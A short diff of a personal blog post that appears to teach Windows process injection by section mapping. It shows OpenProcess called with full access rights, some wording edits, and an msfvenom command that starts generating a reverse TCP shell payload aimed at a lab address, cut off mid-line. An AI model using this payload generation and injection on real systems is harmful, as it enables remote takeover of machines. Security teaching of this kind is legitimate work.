GionaBolzer/blog/content/blog/post1/index.md

 IntPtr hProcess = OpenProcess(0x001F0FFF, false, Id)
 ```

-Where the value 0x001F0FFF is PROCESS_ALL_ACCESS right, the second argument is not relevant in our use, so we set it to false.
+Where the value **0x001F0FFF** is PROCESS_ALL_ACCESS right, the second argument is not relevant in our use, so we set it to false.

 ## Section map

-Before creating the section, because we need to know the size of the shellcode, we create one and add it to the code.
+Before creating the section, because we need to know the size to allocate, we create shell code.
 I choose a simple stageless one with some iterations and a simple encoder:

 ```bash
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.191.226 \